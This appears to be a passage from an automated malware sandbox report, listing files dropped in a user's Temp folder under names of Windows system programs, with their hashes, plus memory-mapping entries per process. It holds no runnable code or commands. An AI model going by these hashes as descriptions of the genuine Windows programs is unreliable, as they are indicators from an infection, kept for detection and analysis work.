SHA512802ee4f8d25417589c7e62f0acc9dc2dc8f1d32654ca435f6aeae2926e6900373648790451c9143856a772a49c2a8f3c8659c5b8260f0f67559aeef875825f05
-
C:\Users\Admin\AppData\Local\Temp\bfsvc.exeMD5
899d3ed011eb58459b8a4fc2b81f0924
SHA180361f1e0b93143ec1ddfee156760f5938c85791
SHA2565e3f311ae67f046b56435067bcdd39fbf836fa0421fbc8c8b0e43e8e47524954
SHA512802ee4f8d25417589c7e62f0acc9dc2dc8f1d32654ca435f6aeae2926e6900373648790451c9143856a772a49c2a8f3c8659c5b8260f0f67559aeef875825f05
-
C:\Users\Admin\AppData\Local\Temp\compile.batMD5
eb51755b637423154d1341c6ee505f50
SHA1d71d27e283b26e75e58c0d02f91d91a2e914c959
SHA256db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9
SHA512e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5
-
C:\Users\Admin\AppData\Local\Temp\compile.batMD5
d90accebb3f79fe65cd938425c07b0ae
SHA19df3812a88d87dd419cd9e89afa5fb1d71be0dc9
SHA256aca74cefaef4b7a32338c9c63187cffa1e808b54ab218a064007683ad1bd3a0e
SHA51244013bfda1dbe5b217d4872e8d550cd00471cb8b969ffd6b07f83b0c59ac20ec2512d275a4603cc00e5de3a04666f66e897601ba51a5e02af622e5139ac04560
-
C:\Users\Admin\AppData\Local\Temp\compile.batMD5
91128da441ad667b8c54ebeadeca7525
SHA124b5c77fb68db64cba27c338e4373a455111a8cc
SHA25650801c4db374acec11831bf7602cd2635bc8964800c67217b25683dce4a45873
SHA512bd2a8bc4458b1bc85c5a59db872278197bb0a2a2086a1a9aa5b6b876965b9f5586959171f334237588cc6b0f9643f580db2e959f82e451f4a3043a27e4a95cdd
-
C:\Users\Admin\AppData\Local\Temp\compile.batMD5
808099bfbd62ec04f0ed44959bbc6160
SHA1f4b6853d958c2c4416f6e4a5be8a11d86f64c023
SHA256f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8
SHA512e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0
-
C:\Users\Admin\AppData\Local\Temp\compile.vbsMD5
ca906422a558f4bc9e471709f62ec1a9
SHA1e3da070007fdeae52779964df6f71fcb697ffb06
SHA256abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee
SHA512661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b
-
C:\Users\Admin\AppData\Local\Temp\compile.vbsMD5
ca906422a558f4bc9e471709f62ec1a9
SHA1e3da070007fdeae52779964df6f71fcb697ffb06
SHA256abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee
SHA512661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b
-
C:\Users\Admin\AppData\Local\Temp\compile.vbsMD5
ca906422a558f4bc9e471709f62ec1a9
SHA1e3da070007fdeae52779964df6f71fcb697ffb06
SHA256abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee
SHA512661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b
-
C:\Users\Admin\AppData\Local\Temp\compile.vbsMD5
ca906422a558f4bc9e471709f62ec1a9
SHA1e3da070007fdeae52779964df6f71fcb697ffb06
SHA256abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee
SHA512661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b
-
C:\Users\Admin\AppData\Local\Temp\configMD5
5cf0b95f68c3304427f858db1cdde895
SHA1a0c5c3872307e9497f8868b9b8b956b9736a9cdf
SHA256353de1200b65a2e89e84b32067a908103cca22ad2e51ba62c171eef3c25b73aa
SHA5125c11c4ebcd4663d02ee3ffc19b7ec83b953dca7a7a1d2b63edaab72425a61e926ac940d99f2faa6b1baba0d28068e8f3ae64105990e0a0626ba02d8f979b455b
-
C:\Users\Admin\AppData\Local\Temp\dav.batMD5
fc3c88c2080884d6c995d48e172fbc4f
SHA1cb1dcc479ad2533f390786b0480f66296b847ad3
SHA2561637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664
SHA5124807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1
-
C:\Users\Admin\AppData\Local\Temp\hh.exeMD5
4d4c98eca32b14aeb074db34cd0881e4
SHA192f213d609bba05d41d6941652a88c44936663a4
SHA2564182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f
SHA512959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf
-
C:\Users\Admin\AppData\Local\Temp\hh.exeMD5
4d4c98eca32b14aeb074db34cd0881e4
SHA192f213d609bba05d41d6941652a88c44936663a4
SHA2564182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f
SHA512959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf
-
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exeMD5
053778713819beab3df309df472787cd
SHA199c7b5827df89b4fafc2b565abed97c58a3c65b8
SHA256f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe
SHA51235a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb
-
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exeMD5
053778713819beab3df309df472787cd
SHA199c7b5827df89b4fafc2b565abed97c58a3c65b8
SHA256f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe
SHA51235a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb
-
C:\Users\Admin\AppData\Local\Temp\splwow64.exeMD5
0d8360781e488e250587a17fbefa646c
SHA129bc9b438efd70defa8fc45a6f8ee524143f6d04
SHA256ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64
SHA512940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e
-
C:\Users\Admin\AppData\Local\Temp\splwow64.exeMD5
0d8360781e488e250587a17fbefa646c
SHA129bc9b438efd70defa8fc45a6f8ee524143f6d04
SHA256ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64
SHA512940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e
-
C:\Users\Admin\AppData\Local\Temp\winhlp32.exeMD5
a776e68f497c996788b406a3dc5089eb
SHA145bf5e512752389fe71f20b64aa344f6ca0cad50
SHA256071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1
SHA51202b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073
-
C:\Users\Admin\AppData\Local\Temp\winhlp32.exeMD5
a776e68f497c996788b406a3dc5089eb
SHA145bf5e512752389fe71f20b64aa344f6ca0cad50
SHA256071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1
SHA51202b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073
-
C:\Users\Admin\AppData\Local\Temp\xwizard.cfgMD5
ae8eed5a6b1470aec0e7fece8b0669ef
SHA1ca0e896f90c38f3a8bc679ea14c808726d8ef730
SHA2563f6ca2bc068c8436044daab867f8ff8f75060048b29882cb2ac9fdef1800df9e
SHA512e79d04f4041edb867fd6bdf4485f78352292782d9405ba81888a1bc62f5039cc46c6cc786ba1fd53284baafa7128e0f875390cb573584ed2d03c3b33c7f93eb6
-
C:\Users\Admin\AppData\Local\Temp\xwizard.exeMD5
df991217f1cfadd9acfa56f878da5ee7
SHA10b03b34cfb2985a840db279778ca828e69813116
SHA256deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112
SHA512175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316
-
C:\Users\Admin\AppData\Local\Temp\xwizard.exeMD5
df991217f1cfadd9acfa56f878da5ee7
SHA10b03b34cfb2985a840db279778ca828e69813116
SHA256deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112
SHA512175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316
-
\Users\Admin\AppData\Local\Temp\RtkBtManServ.exeMD5
88ab0bb59b0b20816a833ba91c1606d3
SHA172c09b7789a4bac8fee41227d101daed8437edeb
SHA256f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA51205cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857
-
memory/240-141-0x0000000000000000-mapping.dmp
-
memory/240-91-0x0000000000000000-mapping.dmp
-
memory/304-86-0x0000000000000000-mapping.dmp
-
memory/364-138-0x0000000000000000-mapping.dmp
-
memory/432-96-0x0000000000000000-mapping.dmp
-
memory/472-101-0x0000000000000000-mapping.dmp
-
memory/484-64-0x0000000001050000-0x000000000158A000-memory.dmpFilesize
5.2MB
-
memory/484-59-0x0000000000000000-mapping.dmp
-
memory/484-61-0x0000000075C51000-0x0000000075C53000-memory.dmpFilesize
8KB
-
memory/484-135-0x0000000000000000-mapping.dmp
-
memory/484-62-0x0000000001050000-0x0000000001051000-memory.dmpFilesize
4KB
-
memory/572-83-0x0000000000000000-mapping.dmp
-
memory/660-55-0x000000013F580000-0x000000013F581000-memory.dmpFilesize
4KB
-
memory/660-93-0x0000000000000000-mapping.dmp
-
memory/676-90-0x0000000000000000-mapping.dmp
-
memory/756-98-0x0000000000000000-mapping.dmp
-
memory/764-87-0x0000000000000000-mapping.dmp
-
memory/812-80-0x0000000000000000-mapping.dmp
-
memory/828-106-0x0000000000000000-mapping.dmp
-
memory/848-89-0x0000000000000000-mapping.dmp
-
memory/852-82-0x0000000000150000-0x0000000000151000-memory.dmpFilesize
4KB
-
memory/852-113-0x000000001B6A0000-0x000000001B73B000-memory.dmpFilesize
620KB
-
memory/852-114-0x000000001A8B0000-0x000000001A8B1000-memory.dmpFilesize
4KB
-
memory/852-66-0x0000000000000000-mapping.dmp
-
memory/852-112-0x00000000023F0000-0x000000000241F000-memory.dmpFilesize
188KB
-
memory/852-94-0x000000001AFE0000-0x000000001B08C000-memory.dmpFilesize
688KB
-
memory/852-75-0x000000001B360000-0x000000001B69B000-memory.dmpFilesize
3.2MB
-
memory/852-111-0x0000000002040000-0x0000000002041000-memory.dmpFilesize
4KB
-
memory/852-110-0x00000000002C0000-0x00000000002C6000-memory.dmpFilesize
24KB
-
memory/852-109-0x00000000009F0000-0x0000000000A1A000-memory.dmpFilesize
168KB
-
memory/852-70-0x00000000002D0000-0x00000000002D1000-memory.dmpFilesize
4KB
-
memory/852-107-0x000000001B0A0000-0x000000001B0A2000-memory.dmpFilesize
8KB
-
memory/876-154-0x0000000000000000-mapping.dmp
-
memory/876-121-0x0000000000000000-mapping.dmp
-
memory/912-145-0x0000000000000000-mapping.dmp
-
memory/928-128-0x0000000000000000-mapping.dmp
-
memory/928-160-0x0000000000000000-mapping.dmp
-
memory/956-95-0x0000000000000000-mapping.dmp
-
memory/1048-84-0x0000000000000000-mapping.dmp
-
memory/1116-149-0x0000000000000000-mapping.dmp
-
memory/1160-103-0x0000000000000000-mapping.dmp
-
memory/1164-74-0x0000000000000000-mapping.dmp
-
memory/1164-166-0x0000000000000000-mapping.dmp
-
memory/1164-131-0x0000000000000000-mapping.dmp
-
memory/1304-92-0x0000000000000000-mapping.dmp
-
memory/1312-100-0x0000000000000000-mapping.dmp
-
memory/1336-72-0x0000000000000000-mapping.dmp
-
memory/1336-165-0x0000000000000000-mapping.dmp
-
memory/1348-105-0x0000000000000000-mapping.dmp
-
memory/1500-115-0x0000000000000000-mapping.dmp
-
memory/1500-117-0x000007FEFB6F1000-0x000007FEFB6F3000-memory.dmpFilesize
8KB
-
memory/1504-85-0x0000000000000000-mapping.dmp
-
memory/1584-97-0x0000000000000000-mapping.dmp
-
memory/1588-77-0x0000000000000000-mapping.dmp
-
memory/1608-79-0x0000000000000000-mapping.dmp
-
memory/1620-78-0x0000000000000000-mapping.dmp
-
memory/1656-118-0x0000000000000000-mapping.dmp
-
memory/1656-88-0x0000000000000000-mapping.dmp
-
memory/1732-102-0x0000000000000000-mapping.dmp
-
memory/1740-99-0x0000000000000000-mapping.dmp
-
memory/1760-81-0x0000000000000000-mapping.dmp
-
memory/1808-157-0x0000000000000000-mapping.dmp
-
memory/1808-57-0x0000000000000000-mapping.dmp
-
memory/1952-125-0x0000000000000000-mapping.dmp
-
memory/1988-104-0x0000000000000000-mapping.dmp
-
memory/2000-76-0x0000000000000000-mapping.dmp